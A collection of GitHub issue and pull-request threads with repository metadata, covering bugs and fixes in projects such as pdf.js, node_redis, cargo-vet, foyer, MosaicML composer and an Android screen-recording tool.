recording never starts but screenshot works Honor 6X - Android 7 Mac OS High Sierra Version 1.65 Just installed the latest version and recording never starts. It displays "recording finished" as soon as video recording button pressed. Same here: Nokia 3 - Android 7.1.1 macOS Sierra 10.12.6 AndroidTool 1.66 (1) However sometimes clicking the video button seemingly does nothing (no indication of recording started), and sometimes it just says "recorded finished" immediately as for @redhatjobin. No video files are created in the screen recordings either (screenshots work though). Same for me Samsung galaxy note 10.1 2010 Android 4.1 Mac Os/X Screenshot is working fine Screencast, just turn as a red square and then nothing is happening. Here under is visible when I start by hand androidtool from my terminal window remote object '/sdcard/capture.mp4' does not exist mv: rename capture.mp4 to p4noteltexdJZO54Kcourtox03242018145957.mp4: No such file or directory ffmpeg version 2.6.1 Copyright (c) 2000-2015 the FFmpeg developers built with llvm-gcc 4.2.1 (LLVM build 2336.11.00) configuration: --prefix=/Volumes/Ramdisk/sw --enable-gpl --enable-pthreads --enable-version3 --enable-libspeex --enable-libvpx --disable-decoder=libvpx --enable-libmp3lame --enable-libtheora --enable-libvorbis --enable-libx264 --enable-avfilter --enable-libopencore_amrwb --enable-libopencore_amrnb --enable-filters --enable-libgsm --enable-libvidstab --enable-libx265 --disable-doc --arch=x86_64 --enable-runtime-cpudetect libavutil 54. 20.100 / 54. 20.100 libavcodec 56. 26.100 / 56. 26.100 libavformat 56. 25.101 / 56. 25.101 libavdevice 56. 4.100 / 56. 4.100 libavfilter 5. 11.102 / 5. 11.102 libswscale 3. 1.101 / 3. 1.101 libswresample 1. 1.100 / 1. 1.100 libpostproc 53. 3.100 / 53. 3.100
2025-04-01T06:39:40.000096
2018-03-14T04:45:29
305021583
{ "authors": [ "mattsmith24", "mortie" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8695", "repo": "mortie/snow", "url": "https://github.com/mortie/snow/pull/10" }
gharchive/pull-request
Added --quiet option. Suppresses most messages. Test failures will still print and the 'Total: Passed X/Y tests' line will still print. This is a great idea. The only issue is that with test suites with only one describe, like the example project, the total isn't printed, because it wolud be wasteful to print both vector: Passed 6/7 tests and Total: Passed 6/7 tests. I'll merge this PR, and then fix that by making it always print the total when --quiet is provided. This is a great idea. The only issue is that when there's only one describe, which is the case in the example project, no total is printed, because it would look weird to print both vector: Passed 6/7 tests and Total: Passed 6/7 tests. I'll make it always print the total when the --quiet option is passed. https://github.com/mortie/snow/commit/13feeb0f129ad0754095af2403348a0392e47e8b Thanks!
2025-04-01T06:39:40.004104
2020-11-10T21:47:19
740266005
{ "authors": [ "imsnif", "qballer" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8696", "repo": "mosaic-org/mosaic", "url": "https://github.com/mosaic-org/mosaic/issues/38" }
gharchive/issue
Mosaic doesn't expand when resizing the terminal window and it panics OS: mac-os terminal: alacritty When I run Mosaic inside Alaacritty, I get into a situation where mosaic pane size is stuck (and sometimes panics). Reconstruct: Open Alacritty to not take full-screen area. run mosaic resize alacritty to full screen notice that Mosaic is still somewhat in original size and doesn't reflow. notice that vim didn't stretch after the resize. I think this is: https://github.com/mosaic-org/mosaic/issues/34? I think you are correct.
2025-04-01T06:39:40.009070
2023-02-15T23:52:31
1586766955
{ "authors": [ "growlix" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8697", "repo": "mosaicml/composer", "url": "https://github.com/mosaicml/composer/pull/1973" }
gharchive/pull-request
Make wandb checkpoint logging compatible with wandb model registry What does this PR do? This PR modifies wandb_logger.py to instantiate model checkpoints as type "model" instead of ".pt", to allow compatibility with W&B's new model registry feature, which MosaicML and WandB are cross-promoting with a demo/webinar next week. Before submitting [x] Have you read the contributor guidelines? [ ] Is this change a documentation change or typo fix? If so, skip the rest of this checklist. [ ] Was this change discussed/approved in a GitHub issue first? It is much more likely to be merged if so. [x] Did you update any related docs and document your change? [x] Did you update any related tests and add any new tests related to your change? (see testing) [x] Did you run the tests locally to make sure they pass? [x] Did you run pre-commit on your change? (see the pre-commit section of prerequisites) @eracah LGTM. Just curious: do you have a link to a wandb run that used this? Why yes I do
2025-04-01T06:39:40.011083
2023-07-06T19:09:10
1792086163
{ "authors": [ "antoinebrl", "eracah" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8698", "repo": "mosaicml/composer", "url": "https://github.com/mosaicml/composer/pull/2353" }
gharchive/pull-request
Fix wandb errror with autoresume issue What does this PR do? The new wandb release (0.15.5) changes it's error messages for artifact downloading failures. Our WandBLogger is designed to be EAFP instead of LBYL, so it relies on catching an exact error to prevent autoresume from trying to download checkpoints from wandb that aren't actually there. This PR makes it so the check is not so specific (i.e. it catches all wandb CommErrors instead of just ones with specific messages). As a result, the EAFP code will then work with the new wandb install. Unfortunately this didn't make it into v0.15.1. Will it be part of the next release?
2025-04-01T06:39:40.014088
2023-03-09T14:26:52
1617362728
{ "authors": [ "Landanjs", "samuelstevens" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8699", "repo": "mosaicml/examples", "url": "https://github.com/mosaicml/examples/issues/219" }
gharchive/issue
Error in ResNet ImageNet examples While training ResNet with the "mild" ImageNet recipe, I realized that the call to config.update(recipe_config) doesn't actually work. See these lines. recipe_config is an OmegaConf dictionary config with keys that include dots in the name: { 'model.loss_name': 'binary_cross_entropy', 'train_dataset.crop_size': 176, 'eval_dataset.resize_size': 232, 'max_duration': '36ep' } When you call config.update(recipe_config), it adds these keys to the config object directly, instead of updating theconfig.train_dataset nested-dictionary. This means the max_duration is actually 36ep because it's a top-level key, but the crop sizes will not be changed and the model loss is still cross entropy instead of the binary variant. You can fix it like this: for key, value in recipe_config.items(): OmegaConf.update(config, key, value) OmegaConf.update respects the dots in the key names. Thanks for identifying this and providing a fix! We will merge the fix in a PR soon. Apologies for the bug 😅
2025-04-01T06:39:40.034885
2019-10-30T21:24:04
514991518
{ "authors": [ "ahy3nz", "mattwthompson", "rsdefever", "uppittu11" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8700", "repo": "mosdef-hub/foyer", "url": "https://github.com/mosdef-hub/foyer/pull/288" }
gharchive/pull-request
Switch entrypoints to functions that load classes PR Summary: Small change post-#282 per suggestions of @uppittu11 and @ahy3nz https://github.com/mosdef-hub/foyer/pull/282#issuecomment-547144491 https://github.com/mosdef-hub/forcefield_perfluoroethers/pull/4/files#r339807274 Instead of the entrypoint being an instance of the force field, it's a function that grabs it. This cleans up the import such that the user more discretely instantiates the object. It also prevents the loading from happening upon import foyer and should save some time on imports. A quick local check saved ~0.3 seconds, no promises this is accurate. PR Checklist [ ] Includes appropriate unit test(s) [ ] Appropriate docstring(s) are added/updated [ ] Code is (approximately) PEP8 compliant [ ] Issue(s) raised/addressed? Looks like the last test is being skipped now (it wasn't before). Should we drop it or fix it? foyer/tests/test_validator.py::test_forcefields[ff_file0] SKIPPED https://travis-ci.org/mosdef-hub/foyer/jobs/605218247?utm_medium=notification&utm_source=github_status We should remove this test because there are no forcefield xmls in foyer/forcefields/. I put them in foyer/forcefields/xml/ but didn't update the glob in that path Maybe we could have a function that detects which plugins are installed when you import foyer (it could save/print the list of plugins too). And this can be used to iterate through all the plugins for this test. We can stick this in another PR if that’s appropriate. On Oct 30, 2019, at 7:20 PM, Matt Thompson<EMAIL_ADDRESS>wrote:  @mattwthompson commented on this pull request. In foyer/tests/test_plugin.pyhttps://nam04.safelinks.protection.outlook.com/?url=https%3A%2F%2Fgithub.com%2Fmosdef-hub%2Ffoyer%2Fpull%2F288%23discussion_r340915935&data=02|01|p.shama%40vanderbilt.edu|94ec9de2f6004448d14108d75d981e67|ba5a7f39e3be4ab3b45067fa80faecad|0|0|637080780257946600&sdata=nl%2Fm2ArV9W%2FIOC7wpOHS40UGG3qqr0BSAXYmfnvOOWM%3D&reserved=0: @@ -6,9 +6,9 @@ def test_basic_import(): assert 'forcefields' in dir(foyer) -@pytest.mark.parametrize('ff_name', ['OPLSAA', 'TRAPPE_UA']) -def test_forcefields_exist(ff_name): ff_name in dir(foyer.forcefields) +@pytest.mark.parametrize('ff_loader', ['load_OPLSAA', 'load_TRAPPE_UA']) +def test_forcefields_exist(ff_loader): assert ff_loader in dir(foyer.forcefields) What's the purpose of this test? It's just to make sure those loader functions are there, which ... I thought we are trying to move opls and trappe to their own repos, like PFE. assumes, for now that we are shipping these force fields with the main repo. I like your idea for iterating through the loaders that are in the entry point group gets at what I was going for but isn't this self-assuring? Since it only iterates through the loaders it finds, is there even a way for it to fail? I guess it could fail if the loader is bad, but the point was to check to see the loaders that we hope are there indeed exist. — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHubhttps://nam04.safelinks.protection.outlook.com/?url=https%3A%2F%2Fgithub.com%2Fmosdef-hub%2Ffoyer%2Fpull%2F288%3Femail_source%3Dnotifications%26email_token%3DAH77TWMFWDJEOLZVFK2PV7DQRIQELA5CNFSM4JHARGS2YY3PNVWWK3TUL52HS4DFWFIHK3DMKJSXC5LFON2FEZLWNFSXPKTDN5WW2ZLOORPWSZGOCJ2AH2Q%23discussion_r340915935&data=02|01|p.shama%40vanderbilt.edu|94ec9de2f6004448d14108d75d981e67|ba5a7f39e3be4ab3b45067fa80faecad|0|0|637080780257946600&sdata=ZsQx6%2FpzFNU%2Byrf5WE8W0j39fHG3J%2BE%2FeNXVO3PnJEY%3D&reserved=0, or unsubscribehttps://nam04.safelinks.protection.outlook.com/?url=https%3A%2F%2Fgithub.com%2Fnotifications%2Funsubscribe-auth%2FAH77TWIJYP5SDIYKPVFIE3TQRIQELANCNFSM4JHARGSQ&data=02|01|p.shama%40vanderbilt.edu|94ec9de2f6004448d14108d75d981e67|ba5a7f39e3be4ab3b45067fa80faecad|0|0|637080780257956591&sdata=FM9tHEIvcK8QQddDe%2Be4C3mpw95JBI4I0%2BpWiZO82WQ%3D&reserved=0. >>> funcs = [func for func in dir(foyer.forcefields) if 'load' in func and '__' not in func] >>> funcs ['load_OPLSAA', 'load_TRAPPE_UA'] >>> [eval('foyer.forcefields.' + func)() for func in funcs] [<foyer.forcefield.Forcefield object at 0x11ab12470>, <foyer.forcefield.Forcefield object at 0x11a89aa58>] I think this accomplishes what you suggested. I also noticed that even though we're checking these functions exist, we're not checking to see that they work. Above should fix that, I think. https://codecov.io/gh/mosdef-hub/foyer/src/update-entrypoints/foyer/forcefields/forcefields.py @rsdefever try to update gaff with these functions @rsdefever try to update gaff with these functions Check out this PR too for inspiration. https://github.com/mosdef-hub/forcefield_perfluoroethers/pull/7 @ahy3nz @uppittu11 take a look at my GAFF-foyer repo. I think it is now working with the latest entry points in foyer.
2025-04-01T06:39:40.037570
2021-10-19T20:14:41
1030703190
{ "authors": [ "justinGilmer", "umesh-timalsina" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8701", "repo": "mosdef-hub/foyer", "url": "https://github.com/mosdef-hub/foyer/pull/471" }
gharchive/pull-request
Return periodic torsion params, regardless of k value PR Summary: See #470 for further details. Previously, we didn't return any parameters if the value of k == 0. This PR attempts to fix that. Resolves #470.
2025-04-01T06:39:40.039855
2022-03-03T22:23:12
1158970750
{ "authors": [ "CalCraven" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8702", "repo": "mosdef-hub/reproducibility_study", "url": "https://github.com/mosdef-hub/reproducibility_study/pull/174" }
gharchive/pull-request
Modify pentaneUA statepoints for flexible and constrained In order to compare between MD and MC treatments of pentaneUA, we need to have both rigid and flexible models for pentaneUA. *Lammps-VU and lammps-UD can not do constrained bonds *All MC engines and HOOMD + Gromacs can do constrained bonds *All MC engines cannot do flexible bonds *All MD engines can do flexible bonds This PR updates the statepoints from init.py with two pentane "molecules"; 1 that will be treated flexibly, and one that will be treated constrained. I looked through the rest of the files, and I think we're good now. I added pentaneUA : Pentane() to the get_molecule function in system_builder, so it should work regardless of the name for the pentane molecule, such as the one used in the spe-subproject. Good catch @jennyfothergill
2025-04-01T06:39:40.078532
2022-12-01T15:13:25
1471491043
{ "authors": [ "Natejoestev", "moudey" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8703", "repo": "moudey/Shell", "url": "https://github.com/moudey/Shell/issues/68" }
gharchive/issue
vscode addon for formatting and highlighting it would be nice if you made a vscode addon for Nilesoft Shell Script (.shl). it would add simple text highlighting and support for: collapsing {...} and multi-line items maybe IntelliSense (also, it would be nice if you had a discord server👍) i'm looking into it and i think i might beable to do it myself. This would be a really great contribution @moudey could you create a discord server so we could chat about this on there?
2025-04-01T06:39:40.117154
2016-07-04T02:46:05
163594533
{ "authors": [ "d4ncer" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8704", "repo": "movio/apidoc-ui", "url": "https://github.com/movio/apidoc-ui/issues/32" }
gharchive/issue
Resource Content changes Remove Application name/description from all resource content pages. Replace with Resource Card for specific operation Implemented
2025-04-01T06:39:40.532001
2024-07-15T18:06:03
2409321071
{ "authors": [ "afranchuk", "mystor" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8706", "repo": "mozilla/cargo-vet", "url": "https://github.com/mozilla/cargo-vet/issues/626" }
gharchive/issue
Audit requirements may be overly strong when dealing with multiple root crates in a workspace This was noticed in https://bugzilla.mozilla.org/show_bug.cgi?id=1907810, specifically because of the changes in https://phabricator.services.mozilla.com/D212959#inline-1194604. If we have multiple crates in the local workspace which have different audit requirements, it is possible for an overly strong requirement to be placed on an indirect dependency. Specifically if we have a dependency graph like the following, where W1 and W2 are toplevel workspace crates, D1 and D2 are third-party dependencies, where D1 optionally depends on D2. W1 does not enable this dependency but W2 does. If W1 has stronger audit requirements than W2 does, those stronger requirements can end up applying to D2, as the two D1 nodes are unified when running cargo metadata to have the combined feature set. W1[req:safe-to-deploy] -> D1[features:] W2[req:safe-to-run] -> D1[features:D2] -> D2 (D2 should require "safe-to-run", but will instead require "safe-to-deploy") Unfortunately, I don't think that the output of cargo metadata really provides a way to solve this ambiguity and get what the resolution would be for each workspace crate independently, such that we could treat the two D1 dependencies as separate "nodes", to not propagate the same audit requirements to their dependencies. It might be possible if we didn't trust the dependency resolution done by cargo and implemented feature resolution ourselves, but that seems like it'd be both a lot of work, and likely to break as cargo updates and changes how feature resolution is handled. I've experimented a bit and it looks like using cargo tree --format "{p} {f}" --package CRATE will show the correct subset of features and thus dependent crates. Unfortunately, though, cargo tree doesn't support an output format more easily ingested by programs. Unfortunately it does look like if you run the cargo tree without a specific --package flag that it'll still unify features, as the in the example from that bug, the neqo-udp crate still has a tokio dependency even under the gkrust crate unless you explicitly scope to only the gkrust package. Does seem like cargo metadata would need a --package flag and we'd need a reliable way to enumerate all packages within the workspace so that we could do separate metadata runs for each one. On top of that we'd also need to tweak the graph building for the resolver and such so that dependency lists and inherited audit requirements could be dependent on which package the dependency graph is coming from.
2025-04-01T06:39:40.547823
2015-06-03T18:35:49
84709566
{ "authors": [ "rlr", "willkg" ], "license": "bsd-3-clause", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8707", "repo": "mozilla/fjord", "url": "https://github.com/mozilla/fjord/pull/593" }
gharchive/pull-request
[bug 1169261] Fix event tracking Event tracking needs the provider version number so we can distinguish between flows for successive algorithms. Further, the "suggest" event needs to be synchronous while the "view*" events can be asynchronous. Sorry--forgot to do this. :( r? lgtm r+! Thank you!
2025-04-01T06:39:40.642735
2018-07-23T22:34:10
343819816
{ "authors": [ "Gozala", "lidel" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8708", "repo": "mozilla/libdweb", "url": "https://github.com/mozilla/libdweb/issues/36" }
gharchive/issue
Request headers support for protocols This is followup from #2 where you can find all the details. Below quote is short summary: Request Headers - Things seems here sadly far more complicated, but it is also clear that this is really important for proper support of Video / Audio tags that just assume HTTP backend. It was suggested to me to that we could do following: Plain data from request so that protocol handler can parse HTTP headers or alternative encoding of metadata. - Expose existing HTTP parser so it could be used. There was quite a reluctance on this though for reasons I did not understand (Part of it was that it's written in C++ and could not be easily extracted for just parsing use). It was highly recommended to instead just support more strictly encoded subset of the headers as anything send from video / audio tags would fit. Unfortunately it seems that supporting request headers would require C++ work and landing corresponding changes into Firefox which is to say it's likely going to take a while and likely will come after we illustrated that people are actually building on this work. Is analog to HTTP's Range requests tracked under this, or should I create a separate issue for it? Is analog to HTTP's Range requests tracked under this, or should I create a separate issue for it? Let's track it here for now, depending how it will pan out I might need separate one, but for now it's good. One thing that could help is an example that produces Range requests that are disregarded. @Gozala I believe seeking with <video> is the most popular use for range requests right now. I created a small sandbox illustrating current problems, more details in README at: lidel/libdweb/tree/video-range-use-case-demo Migrate to https://bugzilla.mozilla.org/show_bug.cgi?id=1572215
2025-04-01T06:39:40.712934
2020-11-10T21:42:17
740263112
{ "authors": [ "siddjain", "timvandermeij" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8709", "repo": "mozilla/pdf.js", "url": "https://github.com/mozilla/pdf.js/issues/12606" }
gharchive/issue
Question: Can this library not be used from Node.js? Hello, I just have a question. Can this library not be used from Node.js? I get this error when trying to open a PDF file The browser/environment lacks native support for critical functionality used by the PDF.js library (e.g. ReadableStream and/or Promise.allSettled); please use an ES5-compatible build instead. my code: const pdfjsLib = require('pdfjs-dist'); const fs = require('fs'); const pdfPath = 'test.pdf'; const data = fs.readFileSync(pdfPath); var loadingTask = pdfjsLib.getDocument({data: data}); loadingTask.promise It's most definitely possible since we have examples of this in the examples folder. The key is that you use the ES5 build as indicated in the error; see https://github.com/mozilla/pdf.js/blob/master/examples/node/pdf2svg.js#L17
2025-04-01T06:39:40.717882
2021-08-03T13:01:02
959092718
{ "authors": [ "Snuffleupagus", "calixteman", "ypersion1956" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8710", "repo": "mozilla/pdf.js", "url": "https://github.com/mozilla/pdf.js/issues/13851" }
gharchive/issue
Null pointer exception in optional_content_config.js when viewing PDF document The document in question: doc_image.pdf Configuration: Web browser - Chrome Operating system and its version: Windows 10 PDF.js version: 2.8.335, 2.10.377 Is a browser extension: no Expected document rendering: Actual rendering with an error I can reproduce with Firefox nightly. @brendandahl, could you have a look ? Thank you. When the fix might be available in a released version? Thank you. When the fix might be available in a released version? The patch has neither been reviewed or landed yet, so you'll have to be patient :-) It will simply be included in the next release, however no exact date for that can be provided (since we don't have a fixed release schedule) and note also that the last release was just nine days ago. Furthermore, this isn't a recent regression either, since it's been present ever since PR #12095 which landed a year ago.
2025-04-01T06:39:40.725820
2024-04-03T20:27:57
2223846727
{ "authors": [ "nico" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8711", "repo": "mozilla/pdf.js", "url": "https://github.com/mozilla/pdf.js/issues/17883" }
gharchive/issue
transposed JBIG2 text segments with non-topleft reference corner don't render correctly Attach (recommended) or Link to PDF file here: symbol-texttranspose.pdf symbol-topright-transposed.pdf symbol-bottomleft-transposed.pdf symbol-bottomright-transposed.pdf Configuration: Web browser and its version: Chrome 123.0.6312.59 Operating system and its version: macOS 13.5.2 PDF.js version: today's trunk at https://mozilla.github.io/pdf.js/web/viewer.html (I verified it has the fix for #17871 already). Is a browser extension: No Steps to reproduce the problem: Open each of the four PDFs above What is the expected behavior? (add screenshot) They should all look like the first one: What went wrong? (add screenshot) The ones that have the reference corner not set to topleft are in various states of disarray: ITU-T_T_88__08_2018.pdf 6.4.5 Decoding the text region has two steps for updating cur_s, once in vi) Update CURS as follows: before drawing the bitmap, and then again xi) Update CURS as follows: after drawing the bitmap. It looks like 25f6a0c13965c5ad9cebe701e4752bde5e8fa811 mixes up these two steps with the "is transposed" check. Depending on the reference corner, this needs to happen before or after drawing for both transposed and untransposed iamges. Like in #17871: I made these files myself while writing a JBIG2 decoder. I'm reasonably confident that the files and Chrome and jbig2dec and my decoder are correct, but it's possible the files are wrong instead. Oh, and this isn't purely theoretical: This slightly-more-real-world PDF looks wonky because of this. transpose2.pdf It's not fully real-world since it's 042_19.jb2 from https://git.ghostscript.com/?p=tests.git;a=tree;f=jbig2;h=8a7abaf842435e204c1ff1dbeed10826bf24afe6;hb=HEAD wrapped in a PDF, so it's still a bit synthetic. But it's a file made by someone else at least, which maybe gives the bug report more credence.
2025-04-01T06:39:40.732357
2024-10-17T14:11:46
2594871918
{ "authors": [ "atrinker", "calixteman", "zzadxz" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8712", "repo": "mozilla/pdf.js", "url": "https://github.com/mozilla/pdf.js/issues/18915" }
gharchive/issue
[Bug]: Annotation artifacts remain visible in viewer after deleting all annotations. Attach (recommended) or Link to PDF file test.pdf Web browser and its version Mozilla Firefox Operating system and its version Windows 10 PDF.js version 4.7.76 Is the bug present in the latest PDF.js version? Yes Is a browser extension No Steps to reproduce the problem Open the attached PDF in the default viewer. Activate the annotation editor by clicking highlight on the toolbar. Scroll down to the following pages to load the annotations. Press Ctrl+A to select all annotations in the PDF. Press delete to remove all annotations at once. What is the expected behavior? All annotations should be removed from the PDF. What went wrong? Although the annotations are no longer selectable, some of them still appear visible in the viewer. They only disappear once the annotation editor is closed. Link to a viewer No response Additional context No response This is a tricky bug... When the pdf is rendered we only render the 2 (it depends of the zoom level) first pages, so we're only aware of the annotations we have on those pages. That means we don't have the ids, the properties, ... of the other annotations in the pdf. For example, we can ctrl+a and then change the color of one highlight, it should impact all the highlights of the document. So I think the only right way to fix this would be to get all the editable annotations when the user is selecting all, put them in the storage, and then apply the changes to the data we've in the storage. The problem is most likely OS related. I played around with it on macOS Firefox latest version (132.0.2 aarch64) and Chrome (131.0.6778.70). PDF.js correctly identified and rendered all highlighted text, regardless of the zoom level (even on "Page Fit", all highlights were selected and removed after backspacing or clicking on the delete button).
2025-04-01T06:39:40.735788
2022-10-18T12:00:34
1413094931
{ "authors": [ "Snuffleupagus" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8713", "repo": "mozilla/pdf.js", "url": "https://github.com/mozilla/pdf.js/pull/15586" }
gharchive/pull-request
Remove the Glyph.matchesForCache method (PR 13494 follow-up) This method, and its class, was originally added in PR #4453 to reduce memory usage when parsing text. Then PR #13494 extended the Glyph-representation slightly to also include the charCode, which made the matchesForCache method effectively redundant since most properties on a Glyph-instance indirectly depends on that one. The only exception is potentially isSpace in multi-byte strings. Also, something that I noticed when testing this code: The matchesForCache method never worked correctly for Glyphs containing accent-data, since Objects are passed by reference in JavaScript. For affected fonts, of which there's only a handful of examples in our test-suite, we'd fail to find an already existing Glyph because of this. /botio test /botio test Note that being able to skip re-parsing this data over and over for every single rendered glyph is a small performance improvement. Some very quick console.time/timeEnd benchmarking, with the default tracemonkey.pdf file, suggest that it's on average 1-2 ms faster per page, which obviously isn't a lot but still doesn't seem worthless.
2025-04-01T06:39:40.737093
2022-12-13T13:37:22
1494254734
{ "authors": [ "calixteman" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8714", "repo": "mozilla/pdf.js", "url": "https://github.com/mozilla/pdf.js/pull/15820" }
gharchive/pull-request
The annotation layer dimensions must be set before adding some elements (follow-up of #15770) In order to move the annotations in the DOM to have something which corresponds to the visual order, we need to have their dimensions/positions which means that the parent must have some dimensions. /botio integrationtest /botio unittest
2025-04-01T06:39:40.740749
2023-02-09T11:04:35
1577682635
{ "authors": [ "Snuffleupagus", "calixteman" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8715", "repo": "mozilla/pdf.js", "url": "https://github.com/mozilla/pdf.js/pull/16029" }
gharchive/pull-request
[api-minor] Don't print hidden annotations (bug 1815196) and handle correctly the NoView and NoPrint flags when they're changed from JS. /botio test /botio test The test bug1737260-oc was failing because the visibility of a widget is now handled in the annotation layer, hence I fixed it in adding annotations: true. The test bug1737260-oc was failing because the visibility of a widget is now handled in the annotation layer, hence I fixed it in adding annotations: true. Does that mean that if you use the API directly (and not the full viewer), will rendering now be "wrong" for the document? I suppose that I don't fully understand exactly why this broke and why updating the test is necessary/correct here. /botio test Does this, together with your recent patches, replace PR #15032? r=me, thank you! Yep that's the idea, I just need to rewrite the part to update appearances when background or border colors changed.
2025-04-01T06:39:40.742414
2018-05-28T20:58:33
327116317
{ "authors": [ "timvandermeij" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8716", "repo": "mozilla/pdf.js", "url": "https://github.com/mozilla/pdf.js/pull/9757" }
gharchive/pull-request
Backout of pull request #9345 Refer to https://github.com/mozilla/pdf.js/pull/9345#issuecomment-392536768. /botio-linux preview Trivial.
2025-04-01T06:39:40.762495
2015-10-12T10:28:22
110948265
{ "authors": [ "anoopvalluthadam", "sylvestre" ], "license": "bsd-3-clause", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8717", "repo": "mozilla/relman-auto-nag", "url": "https://github.com/mozilla/relman-auto-nag/pull/24" }
gharchive/pull-request
test cases added for agents.py This is a test case for agents.py Please do let me know, this is how you want to continue in tests. I am writing for other modules also How to run project_root_folder# cd tests project_root_folder/tests# nosetests test_agents.py .... Ran 4 tests in 5.909s OK I cannot start it. Starting it from tests/ returns: ====================================================================== ERROR: Failure: ImportError (No module named bugzilla.agents) ---------------------------------------------------------------------- Traceback (most recent call last): File "/usr/lib/python2.7/dist-packages/nose/loader.py", line 420, in loadTestsFromName addr.filename, addr.module) File "/usr/lib/python2.7/dist-packages/nose/importer.py", line 47, in importFromPath return self.importFromDir(dir_path, fqname) File "/usr/lib/python2.7/dist-packages/nose/importer.py", line 94, in importFromDir mod = load_module(part_fqname, fh, filename, desc) File "/home/sylvestre/dev/mozilla/relman-auto-nag/tests/test_agents.py", line 1, in <module> from bugzilla.agents import BMOAgent ImportError: No module named bugzilla.agents ---------------------------------------------------------------------- Ran 1 test in 0.001s FAILED (errors=1) `̀`` Sylvestre, I actually installed it using setup.py If we put that in "tests" obviously we can't access the modules like bugzilla until and unless it is in the python path. I thought of adding separate modules for each file, which will increase the readability. If the method I am following is wrong please do let me know, I can push back in to the root folder in to a single file.
2025-04-01T06:39:40.797378
2016-07-22T19:38:51
167117023
{ "authors": [ "Mossop", "victorporof" ], "license": "apache-2.0", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8718", "repo": "mozilla/tofino", "url": "https://github.com/mozilla/tofino/issues/860" }
gharchive/issue
yargs can't handle the way process.argv looks in some electron contexts. yargs assumes that process.argv is [node_path, initial_js, ...rest] so it strips the first two parts of the array and processes the rest (https://github.com/yargs/yargs/blob/master/index.js#L6). But in electron, particularly when we run as a packaged app process.argv is actually [tofino.exe, ...rest] so we lose the first argument and this breaks events coming from squirrel's installer. :(
2025-04-01T06:39:41.000257
2014-05-11T19:34:58
33268712
{ "authors": [ "BenHall", "BridgeAR", "bgSosh", "celesteking", "chrisbaldauf", "jbergknoff", "michelsalib", "raviv" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8719", "repo": "mranney/node_redis", "url": "https://github.com/mranney/node_redis/issues/587" }
gharchive/issue
Doesn't timeout properly when server is unreachable var r = require('redis').createClient(null, '<IP_ADDRESS>', {connect_timeout: 1000}); r.on('ready', function(){ console.log('ready!'); }).on('error', function(err){ console.log('error: ' + err)}); It doesn't timeout after 1 second. It does timeout after unknown amount of time with: error: Error: Redis connection to <IP_ADDRESS>:6379 failed - connect ETIMEDOUT I think it should follow the docs and error out after specified timeout. I also got the same issue, my config is the following: var client = redis.createClient(conf.port, conf.host, { connect_timeout: 100, // abandon connection after 100ms retry_max_delay: 100, // no impact, will not wait more than 100ms between reconnections attemps max_attempts: 1, // only 1 connection attempt enable_offline_queue: false, // no offline queue, must wait for online mode no_ready_check: true // we don't check for redis ready state, let's query the redis directly }); But instead of failing after 100ms, it fails after a full second. Anyone found a fix for that? Similar issues here. +1 +1 Any news on this? I wound up switching to ioredis, which appears to handle the connection timeouts properly and aside from the client creation, be a drop in replacement for my use case. That looks interesting - I'll take a closer look, thanks. To reproduce I paused a Redis Docker container but still seeing long timeouts Is this issue resolved? I experience the behavior described above. The connection fails after about 2 minutes, despite connect_timeout of 5000. I am using version 2.2.5. @jbergknoff this should definitly be resolved. Do you have a reproducable case? And how do your current options look like? Hm, interesting. A slightly modified code snippet from the original post here reproduces the issue: var r = require('redis').createClient({host: '<IP_ADDRESS>', connect_timeout: 1000}); r.on('ready', function(){ console.log('ready!'); }).on('error', function(err){ console.log('error: ' + err)}); The change is in the arguments to createClient. The original snippet unintentionally falls back on the default host (<IP_ADDRESS>) because typeof null is object (https://github.com/NodeRedis/node_redis/blob/afc4989495245e683ce70a234c55046a51e73c08/index.js#L1243). If the host is the bogus <IP_ADDRESS> then this hangs for 2 minutes. If the host is <IP_ADDRESS> then it works as expected. Any insight into that? @jbergknoff thx for pointing that out! I'm looking into it right now. @jbergknoff fixed on master Great, thanks @BridgeAR! Any ETA on next release to npm? Later today
2025-04-01T06:39:41.017406
2019-12-23T15:29:20
541800429
